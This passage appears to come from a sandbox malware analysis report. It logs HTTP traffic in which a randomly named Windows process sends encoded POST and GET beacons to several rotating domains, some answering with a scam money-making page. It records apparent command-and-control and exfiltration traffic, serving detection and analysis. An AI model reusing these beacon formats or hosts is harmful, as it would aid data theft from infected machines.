                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1621&rtt_var=810&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Jan 11, 2025 04:25:45.859411001 CET | 791 | IN | (gzip-compressed response body, continued)


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            6 | 192.168.2.6 | 49997 | 104.21.112.1 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Jan 11, 2025 04:25:47.805329084 CET | 783 | OUT | POST /86am/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.kkpmoneysocial.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.kkpmoneysocial.top
                                                                                                            Referer: http://www.kkpmoneysocial.top/86am/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=6q6n6VLzU8esLixmgTDEGQzvGqIFJvZJOa5yvZJDWzmPSlFHe4zV3hOvLx0dt15xhQECbj3Ng+AVnWE0FoLttPaJgQUxc6msy+yHFyQ45pkUzoHf4sUWub+MFXdH2WN4EmNlHSa7AFF41dcPUBQkM8F9zBMM89CoVnDcfSAkW3pWcOAeoM+nWSiPYHyr1mI/IIKfQeRnYR8AH6fk17wRX2QtCHRbDhfQEA==
                                                                                                            Jan 11, 2025 04:25:48.426722050 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 03:25:48 GMT
                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: loclang=en; expires=Tue, 14-Jan-2025 03:25:48 GMT; Max-Age=259200; path=/
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2c9MC7y0rUxuFXU9zg%2BLo9C0A4C1Q%2FA7O6iIdB0tudLHx7nVzxixLj462ALkYSTNdBWp310U5k6ZJAnL8RKnh9lGhf6QcDABfxfLq6aWlR%2Fa%2BejA69CWJ5CtQxB%2B%2FI1tRxUOvrNozp%2BE"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9001cd383d600f5b-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1588&rtt_var=794&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=783&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Jan 11, 2025 04:25:48.426747084 CET | 795 | IN | (gzip-compressed response body, continued)


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            7 | 192.168.2.6 | 49998 | 104.21.112.1 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Jan 11, 2025 04:25:50.360534906 CET | 1796 | OUT | POST /86am/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.kkpmoneysocial.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.kkpmoneysocial.top
                                                                                                            Referer: http://www.kkpmoneysocial.top/86am/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 36 71 36 6e 36 56 4c 7a 55 38 65 73 4c 69 78 6d 67 54 44 45 47 51 7a 76 47 71 49 46 4a 76 5a 4a 4f 61 35 79 76 5a 4a 44 57 7a 75 50 54 54 52 48 63 5a 7a 56 77 68 4f 76 56 42 30 59 74 31 35 38 68 51 74 46 62 6a 37 43 67 38 34 56 6d 7a 51 30 4d 35 4c 74 30 2f 61 4a 39 41 55 77 53 61 6d 31 79 2b 6a 4d 46 79 41 34 35 70 6b 55 7a 72 66 66 2f 2b 73 57 73 62 2b 4c 47 58 64 62 79 57 4e 51 45 6d 56 31 48 53 65 72 41 54 31 34 31 39 73 50 56 79 34 6b 52 4d 46 2f 77 42 4d 55 38 39 2b 6e 56 6e 66 2b 66 52 64 42 57 77 42 57 63 6f 64 6e 35 4f 69 4d 44 78 36 33 4e 33 36 35 77 6d 4d 4c 41 4f 32 75 62 66 56 6c 62 6a 6f 35 41 75 72 47 77 4c 68 2b 59 30 38 61 48 68 73 65 43 79 6d 47 65 76 64 41 71 2b 64 44 72 38 4f 42 50 4e 63 38 6a 39 6e 70 52 48 6f 55 53 41 54 4a 31 72 66 65 56 2b 6e 37 6b 77 52 52 54 4f 46 33 6d 47 49 61 47 34 59 36 51 7a 6d 35 67 70 46 79 56 6b 42 77 68 55 72 49 77 38 33 32 4a 34 54 46 76 64 7a 72 48 32 44 55 4a 48 55 49 36 47 62 75 48 35 59 66 4c 37 74 70 54 4f 69 4b 76 6a 56 4e 6c [TRUNCATED]
                                                                                                            Jan 11, 2025 04:25:51.015564919 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 03:25:50 GMT
                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: loclang=en; expires=Tue, 14-Jan-2025 03:25:50 GMT; Max-Age=259200; path=/
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BWfy2T9DV3mOXV0pIBDp9suWwNT8hGDGTinT4ca5g9CGcHGDrK5g8Mw4vTz1ftb%2F2S6PlfHcz43okPfO7bVH3za%2FML3PDw2WzJfGYhwOM8LD3fiJWGc4ewpezTPi%2FPx8BUJN9rb70qAe"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9001cd484b42c34f-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1421&min_rtt=1421&rtt_var=710&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1796&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Jan 11, 2025 04:25:51.015644073 CET | 789 | IN | (gzip-compressed response body, continued)


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            8 | 192.168.2.6 | 49999 | 104.21.112.1 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Jan 11, 2025 04:25:52.902344942 CET | 490 | OUT | GET /86am/?9PZt=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6bu8d3TmiM5UZa33tCVJhgbgr0dm7+Mwsdmgoa6VRIc03dgAyFEL2o=&I8A=fF8h_X3X0TB HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.kkpmoneysocial.top
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Jan 11, 2025 04:25:53.531573057 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 03:25:53 GMT
                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: loclang=en; expires=Tue, 14-Jan-2025 03:25:53 GMT; Max-Age=259200; path=/
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FYGSN%2Bl4qK2fVP8wJUbrrT1%2FvyR92zQwVG8sWD2ql0YO75poLZzdGwxdQOThWyX9rJSYM9jnB3s5zT6LNzLAxyZrrE%2FClrCFSsxKmvP65CjKrrYS7iT%2BuZElu%2Bt8BUYMAHKGqOAv05Qs"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9001cd580ca8424b-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1579&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=490&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Ascii: dc6<!DOCTYPE html><html><head><script> setTimeout(function(){ location.href="/index.php"; },5000);</script><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta property="og:image" content="/assets/social_img2.jpg"><meta property="og:title" content="Let's
                                                                                                            Jan 11, 2025 04:25:53.531589985 CET | 1236 | IN | (response body, continued)
                                                                                                            Data Ascii: make money easily with mobile phone "> <meta property="og:description" content="We are the best earning site online paying over $35 million per month to 300,000 members"><meta property="og:image:width" content="600px"><meta property="o
                                                                                                            Jan 11, 2025 04:25:53.531605005 CET | 1236 | IN | (response body, continued)
                                                                                                            Data Ascii: w RegExp("(^| )"+name+"=([^;]*)(;|$)"); if(arr=document.cookie.match(reg)) { return unescape(arr[2]); } else { return ""; } } function rset_Cookie(name,value) {
                                                                                                            Jan 11, 2025 04:25:53.531662941 CET | 725 | IN | (response body, continued)
                                                                                                            Data Ascii: .php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==';};});$.getScript('//moneyeasilyijy.top/typed.js?1736565953',function(){ if(!rget_Cookie('hasgo')){rset_Cookie('godomain','moneyeasilyijy.top');rset_Cookie('area','');rset_Cookie_fast('hasgo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 50001 | 209.74.77.107 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:26:06.783107042 CET | 744 | OUT | POST /4t49/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.happyjam.life
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.happyjam.life
                                                                                                            Referer: http://www.happyjam.life/4t49/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=nQ80xGd328mxhYWdY9GHKknM5mZtt94ay+ZIKhdDq7VkIINqIAYa8dHYv/uF7VJh02hZWzx5u3ZS5q3ZX/Hf5FBUuGIATGWztYOcLBbNTKt1xW5cJqqgEKILbo2OyI7FBnrB6EEPGQiK0leZfDHhDMYjWLAGeAc/0x+gP+uv6cgreayucWAj+QOMWG9p0yiKvUHQxgY8IcPi
Jan 11, 2025 04:26:07.351397991 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 11 Jan 2025 03:26:07 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 50002 | 209.74.77.107 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:26:09.327924013 CET | 768 | OUT | POST /4t49/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.happyjam.life
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.happyjam.life
                                                                                                            Referer: http://www.happyjam.life/4t49/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=nQ80xGd328mxj4GdeeeHb0nN8mZtid4ey+lIKk5TrN9kGMJqLEMa/dHYnfuc/VIj03ckWyN5u3NS5qHZXozc/FBWimICemWztYOcLBfnTK11wmJcLOGjNqIEMY2O2I7BBnqi6Bc1GSaK0gyZR2niKMYhLbBkVyJy0DygFO/DhP8KSMv0AlAAsAuOWElb0SigtU/Qj3UbHoqBH4KXUK0plr1nV6ezMzwMVg==
Jan 11, 2025 04:26:09.894550085 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 11 Jan 2025 03:26:09 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 50003 | 209.74.77.107 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:26:12.003396034 CET | 1781 | OUT | POST /4t49/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.happyjam.life
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.happyjam.life
                                                                                                            Referer: http://www.happyjam.life/4t49/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=nQ80xGd328mxj4GdeeeHb0nN8mZtid4ey+lIKk5TrN1kG5dqRjwa+dHYp/uB/VIi03EoWyACu11S/J/ZAqbcslBWqGIBTGXztY+ALBvnTK11wlRcPaqjLqILbo2SyI7pBj+c6BQlHmmK0AiZdlPiFMYnIbBCVyUy0DvTFOKehNgKW5yOQU4EzyujCUBuwkKVjCjJrGY2KqSJfYKyZ4lRr6NpW9n8FDxTC35Paa2OzYpdou7XXLt046DcQWyFBmDTBolqHVju+kLp/ixtzNn6XVoSOu1e88RgecFT2Yn9agyHUaLLh6Hy0CZSfISP31FGRBoJpbJU/xFc4tAIg7F5l4mQ7Yy25vTCkqzqL9Mz1SUGREgoSRz4IdK2Qtf2f6cqjIahEnBPs72MkpZL0/miIFAYF44pepN+wczIBjWDPYbZbY/gY2kbUSot7ED/TlEJT2zjZrrzKO3NHS5yDXEe7rmq0v5qpa52HZe5bun6oPTw6N1inDHS8MwAOvDqOTaDwz9/HULJPuqqRZyfBdWoqg3PA9TvqlL1cKlkwrQvSZNnWLnaLb3fN+iVS6AgdqFvWXiH1Ye1VUyQs5fcc0AhQIT9001tyCJPUn4qVscz+1Ybsk6NVdA1J96Q5SHB7LegwnwLXp30oeSl2daWoBO+lgwfZOtkABbSdQ1yw56hZfueomKLdKOcb6dr4Nr888sJfQZJWCdw14k2aDxbCssg/k1oe/HDT+7LYAmkizaM8FtvIPwCs20ViHM2hvJylGVlryZb2n0F0dKN9cQkbq7nWaNqmWkcfruDeHguq+/wynF8MLhB9CJgbYVxjnIwmGuxR88fdJrHd/Jtig36Y8P3JUOS7GPj6nI0EkDfit586L6SQdAs7en+SQnGTFjLpRtJOAnSzVkbnYOJyTk7RX4vmj5dGo6k1/eHy3Fr9lNbOL/VucYHZXUIrcLx47H9HOuTZk/FE2v5ejY919zv41KBf58y5sk8pGwr7wsMLwN9SKUe4P+ [TRUNCATED]
Jan 11, 2025 04:26:12.517261028 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 11 Jan 2025 03:26:12 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 50004 | 209.74.77.107 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:26:14.585371017 CET | 485 | OUT | GET /4t49/?I8A=fF8h_X3X0TB&9PZt=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDBpn5+oFhPZEmVooqYAS7CTo53tl0ZDt39OsMeY4bL/YnlFHih9hs= HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.happyjam.life
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Jan 11, 2025 04:26:15.146795034 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 11 Jan 2025 03:26:15 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 50005 | 84.32.84.32 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:26:20.238878965 CET | 759 | OUT | POST /vc3u/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.123hellodrive.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.123hellodrive.shop
                                                                                                            Referer: http://www.123hellodrive.shop/vc3u/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=MKbu1HLFE7i58hZWNNtskxItcmcEaqeTd7Sdo11vSZLmmPOQz3JolgFOSnzSzsg3sX26TVeFb774HYU9htsXVltWaCJOHecRMKa+o+jlsqDVpI/6UURgUGXL0NkzyMR2EIyHTKkzm+mqyadW8FrSgFk8yhDRhbESJjToXo2FY3ZYB/PrW6aXoxcHWHC9I292rCnwYCGMBD4I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 50006 | 84.32.84.32 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:26:22.783435106 CET | 783 | OUT | POST /vc3u/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.123hellodrive.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.123hellodrive.shop
                                                                                                            Referer: http://www.123hellodrive.shop/vc3u/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=MKbu1HLFE7i59CBWMstsxBIuQGcEPaeXd7udo3Z/SrvmjdGQ9T9ooAFOHXzt3sg8sX6UTQ2Fb7/4HZk9he0UTltISiJMI+cRMKa+o+m4srrVo4P6S1R/ZmXKj9kz2MRIEIy1TIQKm4iqyfxW5HSg51kyxRChiOoXPFOnIqugY1dnNpSxKJa06h8FWFaPIW9cpCfwKVKrO3drhmeCl/cacCNIspAmO6maMg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 50007 | 84.32.84.32 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:26:25.335705996 CET | 1796 | OUT | POST /vc3u/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.123hellodrive.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.123hellodrive.shop
                                                                                                            Referer: http://www.123hellodrive.shop/vc3u/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 50008 | 84.32.84.32 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:26:27.877451897 CET | 490 | OUT | GET /vc3u/?9PZt=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eDGlvXn9DOOwTAZn4x9nN1KHp17H/VFEoZ1G6gs1B1eVaLYSkVN0=&I8A=fF8h_X3X0TB HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.123hellodrive.shop
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Jan 11, 2025 04:26:28.319511890 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 03:26:28 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 9973
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Server: hcdn
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            x-hcdn-request-id: 52da3193950aff43434ce0d7fb775364-bos-edge2
                                                                                                            Expires: Sat, 11 Jan 2025 03:26:27 GMT
                                                                                                            Cache-Control: no-cache
                                                                                                            Accept-Ranges: bytes
                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 50009 | 154.208.202.225 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:26:34.042489052 CET | 744 | OUT | POST /k6vm/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.zoomlive.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.zoomlive.live
                                                                                                            Referer: http://www.zoomlive.live/k6vm/
